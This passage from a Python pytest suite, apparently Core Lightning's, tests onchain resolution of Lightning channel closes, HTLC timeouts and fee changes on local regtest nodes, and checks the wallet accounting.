chan2_id = first_channel_id(l2, l3)
tags = check_utxos_channel(l2, [channel_id, chan2_id], expected_2)
check_utxos_channel(l1, [channel_id, chan2_id], expected_1, tags)
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_middleman_their_unilateral_in(node_factory, bitcoind):
""" This is the same as test_onchain_middleman, except that
node l1 drops to chain, not l2, reversing the unilateral
handling logic """
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1_disconnects = ['=WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l2_disconnects = ['-WIRE_UPDATE_FULFILL_HTLC']
l1, l2, l3 = node_factory.get_nodes(3, opts=[{'plugin': coin_mvt_plugin,
'disconnect': l1_disconnects},
{'plugin': coin_mvt_plugin,
'disconnect': l2_disconnects},
{}])
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
c12, _ = l2.fundchannel(l1, 10**6)
c23, _ = l2.fundchannel(l3, 10**6)
channel_id = first_channel_id(l1, l2)
# Make sure routes finalized.
mine_funding_to_announce(bitcoind, [l1, l2, l3])
l1.wait_channel_active(c23)
# Make sure l3 sees gossip for channel now; it can get upset
# and give bad gossip msg if channel is closed before it sees
# node announcement.
wait_for(lambda: l3.rpc.listchannels(c12)['channels'] != [])
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
inv = l3.rpc.invoice(10**8, 'middleman', 'desc')
rhash = inv['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash, payment_secret=inv['payment_secret'])
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l1 will drop to chain.
l1.daemon.wait_for_log(' to AWAITING_UNILATERAL')
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('THEIR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, immediately
l2.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
l1.bitcoin.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l1 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# Graph of coin_move events we expect
expected_2 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
# This is ugly, but this wallet deposit is either unspent or used
# in the next channel open
'A': [('wallet', ['deposit'], ((['withdrawal'], 'D'), (None, None))), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'1': [('wallet', ['deposit'], ['withdrawal'], 'D')],
'B': [('external', ['to_them'], None, None), ('wallet', ['channel_close'], None, None), ('cid1', ['htlc_fulfill'], ['to_wallet'], 'C')],
'C': [('wallet', ['deposit'], None, None)],
'D': [('wallet', ['deposit'], None, None), ('cid2', ['channel_open', 'opener'], None, None)]
}
expected_1 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('external', ['htlc_fulfill'], ['htlc_fulfill'], 'C'), ('cid1', ['delayed_to_us'], ['to_wallet'], 'E')],
'E': [('wallet', ['deposit'], None, None)]
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
chan2_id = first_channel_id(l2, l3)
tags = check_utxos_channel(l2, [channel_id, chan2_id], expected_2)
check_utxos_channel(l1, [channel_id, chan2_id], expected_1, tags)
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_their_unilateral_out(node_factory, bitcoind):
""" Very similar to the test_onchain_middleman, except there's no
middleman, we simply want to check that our offered htlc
on their unilateral returns to us (and is accounted
for correctly) """
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1, l2 = node_factory.line_graph(2, opts=[{'plugin': coin_mvt_plugin},
{'disconnect': disconnects,
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
route = l1.rpc.getroute(l2.info['id'], 10**8, 1)["route"]
assert len(route) == 1
q = queue.Queue()
def try_pay():
try:
# rhash is fake (so is payment_secret)
rhash = 'B1' * 32
l1.rpc.sendpay(route, rhash, payment_secret=rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log(' to AWAITING_UNILATERAL')
l2.daemon.wait_for_log('sendrawtx exit 0')
l2.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC')
    # l1 should wait until to_self_delay (10), then reclaim its timed-out HTLC onchain
l2.bitcoin.generate_block(9)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
l2.daemon.wait_for_log('Ignoring output .*_UNILATERAL/THEIR_HTLC')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
# 100 blocks after last spend, l1+l2 should be done.
l2.bitcoin.generate_block(100)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l2, channel_id) == 0
assert account_balance(l1, channel_id) == 0
# Graph of coin_move events we expect
expected_1 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
# This is ugly, but this wallet deposit is either unspent or used
# in the next channel open
'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('wallet', ['channel_close'], None, None), ('cid1', ['htlc_timeout'], ['to_wallet'], 'C')],
'C': [('wallet', ['deposit'], None, None)],
}
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('external', ['htlc_timeout'], None, None)],
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
tags = check_utxos_channel(l1, [channel_id], expected_1)
check_utxos_channel(l2, [channel_id], expected_2, tags)
def test_listfunds_after_their_unilateral(node_factory, bitcoind):
"""We keep spending info around for their unilateral closes.
Make sure we show the address.
"""
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
    # FIXME: We can get warnings from unilateral changes, since we treat
    # such errors as soft because of LND.
l1, l2 = node_factory.line_graph(2, opts=[{'plugin': coin_mvt_plugin,
"allow_warning": True},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
    # listfunds will show 1 change output, and channels.
assert len([o for o in l1.rpc.listfunds()['outputs'] if not o['reserved']]) == 1
l1.stop()
l2.rpc.close(l1.info['id'], unilateraltimeout=1)
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(100)
l1.start()
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) == 2)
assert all(['address' in o for o in l1.rpc.listfunds()['outputs']])
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_feechange(node_factory, bitcoind, executor):
"""Onchain handling when we restart with different fees"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1, l2 = node_factory.line_graph(2, opts=[
{
'may_reconnect': True,
'allow_warning': True,
}, {
'may_reconnect': True,
'disconnect': disconnects,
}
])
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash, payment_secret=inv['payment_secret'])
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US .* after 6 blocks')
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Make sure that gets included.
bitcoind.generate_block(1)
# Now we restart with different feerates.
l1.stop()
l1.daemon.cmd_line.append('--override-fee-rates=20000/9000/2000')
l1.start()
    # We recognize the different proposal as ours.
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
# We use 3 blocks for "reasonable depth", so add two more
bitcoind.generate_block(2)
# Note that the very similar test_onchain_timeout looks for a
# different string: that's because it sees the JSONRPC response,
# and due to the l1 restart, there is none here.
l1.daemon.wait_for_log('WIRE_PERMANENT_CHANNEL_FAILURE')
# 90 later, l2 is done
bitcoind.generate_block(89)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 7 blocks and l1 should be done.
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@pytest.mark.skip("Lisa, please fix this!")
@pytest.mark.developer("needs DEVELOPER=1 for dev-set-fees")
def test_onchain_all_dust(node_factory, bitcoind, executor):
"""Onchain handling when we reduce output to all dust"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None,
'plugin': coin_mvt_plugin},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects, options={'plugin': coin_mvt_plugin})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
channel_id = first_channel_id(l1, l2)
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**7 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash, payment_secret=inv['payment_secret'])
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
# Make l1's fees really high (and wait for it to exceed 50000)
l1.set_feerates((100000, 100000, 100000, 100000))
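    # (the log regex below matches any 5-digit feerate of at least 50000)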
l1.daemon.wait_for_log('Feerate estimate for unilateral_close set to [56789][0-9]{4}')
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by IGNORING_TINY_PAYMENT .* after 6 blocks')
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('IGNORING_TINY_PAYMENT',
'THEIR_UNILATERAL/OUR_HTLC')
l1.daemon.wait_for_log('Ignoring output .*: THEIR_UNILATERAL/OUR_HTLC')
# 100 deep and l2 forgets.
bitcoind.generate_block(93)
sync_blockheight(bitcoind, [l1, l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# l1 does not wait for ignored payment.
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# Graph of coin_move events we expect
expected_1 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('wallet', ['channel_close'], None, None), ('cid1', ['htlc_timeout'], ['ignored'], 'C')],
'C': [('wallet', ['deposit'], None, None)],
}
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('external', ['htlc_timeout'], None, None)],
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
tags = check_utxos_channel(l1, [channel_id], expected_1)
check_utxos_channel(l2, [channel_id], expected_2, tags)
@pytest.mark.developer("needs DEVELOPER=1 for dev_fail")
def test_onchain_different_fees(node_factory, bitcoind, executor):
"""Onchain handling when we've had a range of fees"""
l1, l2 = node_factory.line_graph(2, fundchannel=True, fundamount=10**7,
opts={'may_reconnect': True})
l2.rpc.dev_ignore_htlcs(id=l1.info['id'], ignore=True)
p1 = executor.submit(l1.pay, l2, 1000000000)
l2.daemon.wait_for_log('htlc 0: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
l1.set_feerates((16000, 11000, 7500, 3750))
p2 = executor.submit(l1.pay, l2, 900000000)
l2.daemon.wait_for_log('htlc 1: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
# Restart with different feerate for second HTLC.
l1.set_feerates((5000, 5000, 5000, 3750))
l1.restart()
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
p3 = executor.submit(l1.pay, l2, 800000000)
l2.daemon.wait_for_log('htlc 2: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
# Drop to chain
l1.rpc.dev_fail(l2.info['id'])
l1.wait_for_channel_onchain(l2.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Both sides should have correct feerate
assert l1.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 11000
}]
assert l2.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 11000
}]
bitcoind.generate_block(5)
# Three HTLCs, and one for the to-us output.
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 4)
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
with pytest.raises(Exception):
p1.result(10)
with pytest.raises(Exception):
p2.result(10)
with pytest.raises(Exception):
p3.result(10)
# Two more for HTLC timeout tx to be spent.
bitcoind.generate_block(2)
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 3)
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_new_commit(node_factory, bitcoind, executor):
# Test case where we have two possible commits: it will use new one.
disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, new commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# OK, time out HTLC.
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
l2.daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
def setup_multihtlc_test(node_factory, bitcoind):
# l1 -> l2 -> l3 -> l4 -> l5 -> l6 -> l7
    # l1 and l7 ignore any HTLCs they're sent.
# For each direction, we create these HTLCs with same payment_hash:
# 1 failed (CLTV1)
# 1 failed (CLTV2)
# 2 live (CLTV2)
# 1 live (CLTV3)
nodes = node_factory.line_graph(7, wait_for_announce=True,
opts={'dev-no-reconnect': None,
'may_reconnect': True})
# Balance by pushing half the funds.
b11 = nodes[-1].rpc.invoice(10**9 // 2, '1', 'balancer')['bolt11']
nodes[0].rpc.pay(b11)
nodes[0].rpc.dev_ignore_htlcs(id=nodes[1].info['id'], ignore=True)
nodes[-1].rpc.dev_ignore_htlcs(id=nodes[-2].info['id'], ignore=True)
preimage = "0" * 64
inv = nodes[0].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)
h = inv['payment_hash']
nodes[-1].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
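    # Both end nodes know the same preimage, so HTLCs sent in either
    # direction share the same payment_hash.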
# First, the failed attempts (paying wrong node). CLTV1
r = nodes[0].rpc.getroute(nodes[-2].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[0].rpc.waitsendpay(h)
r = nodes[-1].rpc.getroute(nodes[1].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[-1].rpc.waitsendpay(h)
# Now increment CLTV -> CLTV2
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
# Now, the live attempts with CLTV2 (blackholed by end nodes)
r = nodes[0].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-1].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
    # We send the second HTLC from a different node, since nodes refuse to
    # send multiple HTLCs with the same hash.
r = nodes[1].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-2].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-2].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
# Now increment CLTV -> CLTV3.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
r = nodes[2].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[2].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-3].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-3].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
# Make sure HTLCs have reached the end.
nodes[0].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
nodes[-1].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
return h, nodes
@pytest.mark.developer("needs DEVELOPER=1 for dev_ignore_htlcs")
@pytest.mark.slow_test
def test_onchain_multihtlc_our_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode goes onchain with n+1 channel.
nodes[mid].rpc.dev_fail(nodes[mid + 1].info['id'])
nodes[mid].wait_for_channel_onchain(nodes[mid + 1].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
    # At depth 5, midnode will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# The three outgoing HTLCs time out at 21, 21 and 22 blocks.
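    # (We are at depth 5 here: one block for the close plus the 4 above, so
    # 16 more blocks reaches the first timeout depth of 21.)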
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# And three more for us to consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Depth 3 to consider it settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 100 it's all done (we didn't bother waiting for mid+1's
# spends, so that might still be going)
bitcoind.generate_block(97)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@pytest.mark.developer("needs DEVELOPER=1 for dev_ignore_htlcs")
@pytest.mark.slow_test
def test_onchain_multihtlc_their_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode+1 goes onchain with midnode channel.
nodes[mid + 1].rpc.dev_fail(nodes[mid].info['id'])
nodes[mid + 1].wait_for_channel_onchain(nodes[mid].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# At depth 5, midnode+1 will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET')
# The three outgoing HTLCs time out at depth 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are at depths 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
